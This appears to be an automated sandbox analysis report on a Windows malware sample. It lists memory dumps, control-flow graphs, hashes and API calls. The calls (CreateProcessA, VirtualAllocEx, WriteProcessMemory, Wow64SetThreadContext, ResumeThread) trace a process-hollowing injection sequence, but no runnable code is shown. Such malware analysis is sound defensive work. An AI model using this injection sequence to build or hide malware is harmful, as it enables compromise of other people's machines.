• Instruction ID: 13dfddeb44cf6b1dcc245258d00db1c4ce55ed6f98dd545637402197e5af229e
• Opcode Fuzzy Hash: ccad3892a8b347a659abd93fd99572b4c6af5458b631ac628d3fe5faf040162d
• Instruction Fuzzy Hash: 9C61C574E04208CFDB08DFA9D594AEDFBF6BF89300F14902AE50AAB355D7345946CB50

Control-flow Graph
control_flow_graph 918 54d9b98-54d9bcb 919 54d9bcd 918->919 920 54d9bd2-54d9c0d 918->920 919->920 921 54d9c20-54d9c3f 920->921 924 54d9c68-54d9cd8 921->924 925 54d9cf7-54d9d04 921->925 955 54d9cda call 54daabe 924->955 956 54d9cda call 54dad3a 924->956 957 54d9cda call 54dabb6 924->957 958 54d9cda call 54dac01 924->958 959 54d9cda call 54daac0 924->959 928 54d9d0d-54d9d14 925->928 930 54d9d4f-54d9d68 928->930 931 54d9d40-54d9daf 928->931 937 54d9d81-54d9d8e 930->937 938 54d9d90-54d9da7 930->938 936 54d9ceb-54d9cef 931->936 940 54d9d6a-54d9d7f 936->940 941 54d9cf1-54d9cf2 936->941 937->931 938->937 940->937 947 54d9d16-54d9d3b 940->947 941->924 943 54d9ce0-54d9cea 947->931 949 54d9c44-54d9c5e call 54d9b50 947->949 952 54d9c0f-54d9c14 949->952 953 54d9c60-54d9c66 949->953 952->936 954 54d9c1a-54d9c1b 952->954 953->924 953->952 954->921 954->936 955->943 956->943 957->943 958->943 959->943
Strings
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID: Te^q$Te^q
• API String ID: 0-3743469327
• Opcode ID: d733cee774529ff2b63a07eeec878487ba3fe04b830aa54f4964f597ff4b7f90
• Instruction ID: c1779c3542a90c8c5370a2e35b84c90505cfb142fde5a0fe4b5a17e05aebe328
• Opcode Fuzzy Hash: d733cee774529ff2b63a07eeec878487ba3fe04b830aa54f4964f597ff4b7f90
• Instruction Fuzzy Hash: 9B51C574E052088FDB48CFE9C994AEEFBB6BF89300F14812AE519AB355DB355906CF50

Control-flow Graph
control_flow_graph 1183 77606dd-776077d 1185 77607b6-77607d6 1183->1185 1186 776077f-7760789 1183->1186 1193 776080f-776083e 1185->1193 1194 77607d8-77607e2 1185->1194 1186->1185 1187 776078b-776078d 1186->1187 1188 77607b0-77607b3 1187->1188 1189 776078f-7760799 1187->1189 1188->1185 1191 776079d-77607ac 1189->1191 1192 776079b 1189->1192 1191->1191 1195 77607ae 1191->1195 1192->1191 1202 7760877-7760931 CreateProcessA 1193->1202 1203 7760840-776084a 1193->1203 1194->1193 1196 77607e4-77607e6 1194->1196 1195->1188 1197 77607e8-77607f2 1196->1197 1198 7760809-776080c 1196->1198 1200 77607f6-7760805 1197->1200 1201 77607f4 1197->1201 1198->1193 1200->1200 1204 7760807 1200->1204 1201->1200 1214 7760933-7760939 1202->1214 1215 776093a-77609c0 1202->1215 1203->1202 1205 776084c-776084e 1203->1205 1204->1198 1207 7760850-776085a 1205->1207 1208 7760871-7760874 1205->1208 1209 776085e-776086d 1207->1209 1210 776085c 1207->1210 1208->1202 1209->1209 1212 776086f 1209->1212 1210->1209 1212->1208 1214->1215 1225 77609c2-77609c6 1215->1225 1226 77609d0-77609d4 1215->1226 1225->1226 1227 77609c8 1225->1227 1228 77609d6-77609da 1226->1228 1229 77609e4-77609e8 1226->1229 1227->1226 1228->1229 1232 77609dc 1228->1232 1230 77609ea-77609ee 1229->1230 1231 77609f8-77609fc 1229->1231 1230->1231 1233 77609f0 1230->1233 1234 7760a0e-7760a15 1231->1234 1235 77609fe-7760a04 1231->1235 1232->1229 1233->1231 1236 7760a17-7760a26 1234->1236 1237 7760a2c 1234->1237 1235->1234 1236->1237 1239 7760a2d 1237->1239 1239->1239
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0776091E
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 1cc1a73ead47d82a6b4b4d0f3de3bd0141714127db3633af946e3bde7e5b5a60
• Instruction ID: f362b94c79a1dc2788e55f9ca79d09294fee2f84ebf4009c47495c4edb63ff17
• Opcode Fuzzy Hash: 1cc1a73ead47d82a6b4b4d0f3de3bd0141714127db3633af946e3bde7e5b5a60
• Instruction Fuzzy Hash: 9FA14AB1D0021ADFEB14CF68C845BEEBBB2FF44354F1485A9E848A7244D7749985CF92

Control-flow Graph
control_flow_graph 1240 77606e8-776077d 1242 77607b6-77607d6 1240->1242 1243 776077f-7760789 1240->1243 1250 776080f-776083e 1242->1250 1251 77607d8-77607e2 1242->1251 1243->1242 1244 776078b-776078d 1243->1244 1245 77607b0-77607b3 1244->1245 1246 776078f-7760799 1244->1246 1245->1242 1248 776079d-77607ac 1246->1248 1249 776079b 1246->1249 1248->1248 1252 77607ae 1248->1252 1249->1248 1259 7760877-7760931 CreateProcessA 1250->1259 1260 7760840-776084a 1250->1260 1251->1250 1253 77607e4-77607e6 1251->1253 1252->1245 1254 77607e8-77607f2 1253->1254 1255 7760809-776080c 1253->1255 1257 77607f6-7760805 1254->1257 1258 77607f4 1254->1258 1255->1250 1257->1257 1261 7760807 1257->1261 1258->1257 1271 7760933-7760939 1259->1271 1272 776093a-77609c0 1259->1272 1260->1259 1262 776084c-776084e 1260->1262 1261->1255 1264 7760850-776085a 1262->1264 1265 7760871-7760874 1262->1265 1266 776085e-776086d 1264->1266 1267 776085c 1264->1267 1265->1259 1266->1266 1269 776086f 1266->1269 1267->1266 1269->1265 1271->1272 1282 77609c2-77609c6 1272->1282 1283 77609d0-77609d4 1272->1283 1282->1283 1284 77609c8 1282->1284 1285 77609d6-77609da 1283->1285 1286 77609e4-77609e8 1283->1286 1284->1283 1285->1286 1289 77609dc 1285->1289 1287 77609ea-77609ee 1286->1287 1288 77609f8-77609fc 1286->1288 1287->1288 1290 77609f0 1287->1290 1291 7760a0e-7760a15 1288->1291 1292 77609fe-7760a04 1288->1292 1289->1286 1290->1288 1293 7760a17-7760a26 1291->1293 1294 7760a2c 1291->1294 1292->1291 1293->1294 1296 7760a2d 1294->1296 1296->1296
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0776091E
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 64fdaa1349e288f2cb4b36460ea085e7aef11cc8fa847301f52d21a4a430eda2
• Instruction ID: 66106e66d90d009f8a91bebe913ec2a8d08930a7c2479e6601f47f1bfed8713c
• Opcode Fuzzy Hash: 64fdaa1349e288f2cb4b36460ea085e7aef11cc8fa847301f52d21a4a430eda2
• Instruction Fuzzy Hash: 349159B1D0021ADFEB14CF68C845BEEBBB2FF44354F1485A9E848A7244DB749985CF92

                                                                                                                                                                                               Control-flow graph (rendered image with Executed / Not Executed legend, not reproduced): function spanning dfb7b7-dfba48, with internal calls to dfb458, dfb464, dfb474, dfb484, dfb494, dfba52/dfba60 and dfbd50/dfbd60; GetModuleHandleW is called from basic block dfba00-dfba2b.
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFBA1E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              • Opcode ID: 43d43ec3650bc07a15bcadc94cd1d9fa31f35875b56499c69a1582769d901102
                                                                                                                                                                                              • Instruction ID: e32a5a742ea65360c41df923562e7ae43d9775a777e61e9b4bb99114411438c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43d43ec3650bc07a15bcadc94cd1d9fa31f35875b56499c69a1582769d901102
                                                                                                                                                                                              • Instruction Fuzzy Hash: B5815870A00B098FDB24DF29D14176ABBF5FF88354F04892ED18ADBA50D775E949CBA0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: 483c2c42a3eb66e94af0dd836a8f1e7e3f5e518c0e673c9d5c0b77c60338ed4c
                                                                                                                                                                                              • Instruction ID: ec6e4e9ce00c1fdd42dc3ba94a66b4134ff79e70a52283606025c6b5dfb29941
                                                                                                                                                                                              • Opcode Fuzzy Hash: 483c2c42a3eb66e94af0dd836a8f1e7e3f5e518c0e673c9d5c0b77c60338ed4c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 904122B4C0071DCFDB24CFA9C884ADDBBB6BF49304F24806AD509AB255DB756946CFA0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: a98d905870845a089b74c7a72133d889b3fdbd4d1ae2ddd8b6c02db0231389f1
                                                                                                                                                                                              • Instruction ID: c1b2583e7b0353917572916d3408419b07397a2a35ded3fe0b2d178a63de184e
                                                                                                                                                                                              • Opcode Fuzzy Hash: a98d905870845a089b74c7a72133d889b3fdbd4d1ae2ddd8b6c02db0231389f1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 224113B0C0071DCFDB24DFA9C844B9EBBB6BF49304F24806AD509AB255DB756945CFA0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                                                                              • Opcode ID: 56f8b6fe8fcbe741506227a38f8e8a6ffa128b0a2afa989806cad9b039a8b6b1
                                                                                                                                                                                              • Instruction ID: c8a40daae45ba2c197fe23232dcb74b18fb5637c969ca82336933a01d119b62f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 56f8b6fe8fcbe741506227a38f8e8a6ffa128b0a2afa989806cad9b039a8b6b1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F319A72900349DFDB12CFA9C840ADEBFF8EF08310F04805AE954AB221C335A855DFA1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077604F0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                              • Opcode ID: 31cac38d28261c077605cde2d8a9aa2f051474303963f444380871d081a4c582
                                                                                                                                                                                              • Instruction ID: d386ff10a2a93c8d571ecc95f1f75bf097e23d666035bb1d55b19e147d72b1a0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 31cac38d28261c077605cde2d8a9aa2f051474303963f444380871d081a4c582
                                                                                                                                                                                              • Instruction Fuzzy Hash: 952127B69003599FCB10CFA9C985BDEBBF1FF48310F10882AE959A7254D7789944CBA4
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077604F0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                              • Opcode ID: ae3ddc6be72e84fd79227ba7ca454ed5d2b5c199757c668f65e4ac6b65550fe4
                                                                                                                                                                                              • Instruction ID: 83e1d5a7b2e6378e2a095f37663e7e4457f82982d3593f1656cb6ff25bbcd27c
                                                                                                                                                                                              • Opcode Fuzzy Hash: ae3ddc6be72e84fd79227ba7ca454ed5d2b5c199757c668f65e4ac6b65550fe4
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA2139B19003599FCB10CFAAC885BDEBBF5FF48310F108429E959A7255D7789944CBA4
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077605D0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                                                              • Opcode ID: 77796f2b8bb9d25325f0d378d52b89d7df78df8e311c2e0bc221cfbc55c19862
                                                                                                                                                                                              • Instruction ID: 2c7ab3e9d65e7c0241d2df496a752e23e93b6f5d0a2a5af67afd396ca9967ee2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 77796f2b8bb9d25325f0d378d52b89d7df78df8e311c2e0bc221cfbc55c19862
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A2134B1D003599FCB10CFA9C884AEEBBF1FF48310F10882AE959A7255C7399945CBA4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Te^q
                                                                                                                                                                                              • API String ID: 0-671973202
                                                                                                                                                                                              • Opcode ID: 81ccb53c85cfcd7047716ecf31d07c1eb566a0e382e160fb0861000c3825a69e
                                                                                                                                                                                              • Instruction ID: e0e808275176fc9ee72bcf0871eed587bd9bcce5345e29c16112fd95e50d3568
                                                                                                                                                                                              • Opcode Fuzzy Hash: 81ccb53c85cfcd7047716ecf31d07c1eb566a0e382e160fb0861000c3825a69e
                                                                                                                                                                                              • Instruction Fuzzy Hash: CBC12674E05219CFCB44DFA8D990AEDFBB6FF89300F10866AE419AB355DB309946CB50
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077605D0
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07760346
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07760346
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04F1BDEA,?,?,?,?,?), ref: 04F1BE8F
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DFDD2F
Memory Dump Source
• Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00DFBA1E
Memory Dump Source
• Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04F1BDEA,?,?,?,?,?), ref: 04F1BE8F
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0776040E
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0776040E
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00DFBA1E
Memory Dump Source
• Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 07762F5D
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,?,?,?), ref: 07762F5D
Memory Dump Source
• Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID: _
• API String ID: 0-701932520
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1829908732.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b9d000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                              • Opcode ID: f12245066e90656b41aef593d89d0176a84c886a3fa37f40cc5aa0aa18dc7b46
                                                                                                                                                                                              • Instruction ID: 309c066c950f6483d2f1ad18dfac731195af8fc277c0b0177ed46887d5afc02d
                                                                                                                                                                                              • Opcode Fuzzy Hash: f12245066e90656b41aef593d89d0176a84c886a3fa37f40cc5aa0aa18dc7b46
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33212871504204DFDF05DF15D9C0B26BFA5FB94314F20C5B9D9094B356C336E856C6A2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1829908732.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b9d000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9dc4ef43afa64a342f4fc44c48929abdb88438a66c61a08f579f53a9d6c0eace
                                                                                                                                                                                              • Instruction ID: 3a0b1b1740f1db7b290cfe037f0de727220dba2bc28516b19d3cdb821aa21cd4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dc4ef43afa64a342f4fc44c48929abdb88438a66c61a08f579f53a9d6c0eace
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98212271500240DFDF05DF15DAC0B2ABFA5FBA8318F20C5B9E8094B266C336D856CBA2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 62a7038d527d7620ec4ae125c618a23196de54e98694cf6aca0775d9bc312ef0
                                                                                                                                                                                              • Instruction ID: 16583a4647d6d1e3772c1a8eb1d91eb8ea301666f7f6d1068dea0ea58cbe40bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62a7038d527d7620ec4ae125c618a23196de54e98694cf6aca0775d9bc312ef0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5721A575E09219DFCB00CFA9E4985EDFBF6EB49350F115426E916B7310D63459028F71
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 054fa40086fd0df44a46c28c943fca320c3438a047518ddedafa6d1d596ea3cd
                                                                                                                                                                                              • Instruction ID: f053f6610c1d9808da2ff4a72e12be81c246ff4dee160a47c79abfaddf69393d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 054fa40086fd0df44a46c28c943fca320c3438a047518ddedafa6d1d596ea3cd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9431A374A142099FCB54DFA9D498AEEBBF1BF49310F00916AE416A7360DB30AE45CF60
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1830090543.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bad000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 88547a39e7cbed97be40cc21c8dec8fc7749c9d8ea069810a7ee35980f89937d
                                                                                                                                                                                              • Instruction ID: c7b78ae4d88881361ac37c7e5901d1d0274fe7888660484e43619e7f529a8705
                                                                                                                                                                                              • Opcode Fuzzy Hash: 88547a39e7cbed97be40cc21c8dec8fc7749c9d8ea069810a7ee35980f89937d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 83210471608200DFCB24DF24D9D4B26BFA5FB89314F20C5ADD84A4B696C33AD847CA61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1830090543.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
